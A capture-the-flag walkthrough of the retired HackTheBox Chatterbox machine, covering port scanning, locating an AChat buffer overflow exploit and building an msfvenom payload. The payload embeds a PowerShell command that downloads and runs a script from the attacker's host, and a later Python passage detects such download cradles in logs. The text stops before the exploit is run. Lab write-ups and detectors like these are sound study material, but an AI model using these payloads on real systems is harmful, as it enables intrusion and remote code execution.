Complete HackTheBox Chatterbox Walkthrough (Powershell)

Today I am solving the HackTheBox Chatterbox machine. This is a retired machine, but it is a great one for studying Windows privilege escalation.

HackTheBox Chatterbox

I am doing this machine to help me better understand Windows exploitation and prepare myself for the eCPPTv2 certification by eLearnSecurity.

To start, I will scan the machine with rustscan, checking all 65535 available ports.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ rustscan -a chatterbox.htb -- -p-

The machine has two open ports. Let’s check what services are running on them using nmap.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ nmap -T4 -A -p- chatterbox.htb -Pn -p9255,9256

The Nmap scan shows that the AChat system is running on both ports: port 9255 serves an HTTPD service and port 9256 runs the chat service itself.

Let’s search for an exploit using searchsploit, and enumerate all folders and files on port 9255 since it has an HTTP server running.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit achat

searchsploit achat

Great, searchsploit found an exploit for a Remote Buffer Overflow on the Achat system.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit -m windows/remote/36025.py
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines (637)

Copied to: /home/rfs/HackTheBox/HTB_Chatterbox/36025.py

Exploitation

How to Generate Metasploit Payloads

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.52/writeup.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python > new.txt
┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ python3 -m http.server 80
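The payload generated above is a classic PowerShell download cradle: IEX evaluates a script that Net.WebClient.DownloadString pulls over plain HTTP. As an added example that is not part of this walkthrough, the Python below shows how a defender would spot that cradle in PowerShell script block logging (Event ID 4104 ScriptBlockText); the log lines are constructed samples, and the 10.10.14.52 URL is the one from the command above.

```python
import re

# A download cradle needs two halves: something that evaluates a string as
# code, and something that fetches that string over the network.
EVAL_PATTERNS = [r"\bIEX\b", r"\bInvoke-Expression\b"]
FETCH_PATTERNS = [
    r"New-Object\s+(System\.)?Net\.WebClient",
    r"\.DownloadString\(",
    r"\bInvoke-WebRequest\b|\biwr\b",
]
URL_PATTERN = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def classify_script_block(text):
    """Return details if the block looks like a download cradle, else None."""
    # PowerShell is case-insensitive, so 'downloadString' must match too.
    has_eval = any(re.search(p, text, re.IGNORECASE) for p in EVAL_PATTERNS)
    has_fetch = any(re.search(p, text, re.IGNORECASE) for p in FETCH_PATTERNS)
    if not (has_eval and has_fetch):
        return None
    urls = URL_PATTERN.findall(text)
    # Plain-HTTP fetches, like the one in this walkthrough, are an extra red flag.
    return {
        "plaintext_http": any(u.lower().startswith("http://") for u in urls),
        "urls": urls,
    }


def scan_log(lines):
    """Scan (timestamp, ScriptBlockText) pairs; return [(timestamp, finding)]."""
    findings = []
    for ts, block in lines:
        hit = classify_script_block(block)
        if hit:
            findings.append((ts, hit))
    return findings


# Constructed sample entries resembling Event ID 4104 ScriptBlockText.
SAMPLE_LOG = [
    ("2024-01-01T10:00:01", "Get-ChildItem C:\\Users | Select-Object Name"),
    ("2024-01-01T10:00:02",
     "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.52/writeup.ps1')"),
    ("2024-01-01T10:00:03",
     "$c = New-Object Net.WebClient; $c.DownloadFile('https://example.invalid/a.txt','a.txt')"),
    ("2024-01-01T10:00:04",
     "invoke-expression (invoke-webrequest https://example.invalid/x.ps1).Content"),
]

if __name__ == "__main__":
    for ts, finding in scan_log(SAMPLE_LOG):
        print(ts, finding)
```

The third sample only downloads a file without evaluating it, so it is deliberately not flagged; pair this with blocking outbound plain HTTP from servers to cut off the cradle itself.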


Achat 0.150 beta7 – Remote Buffer Overflow
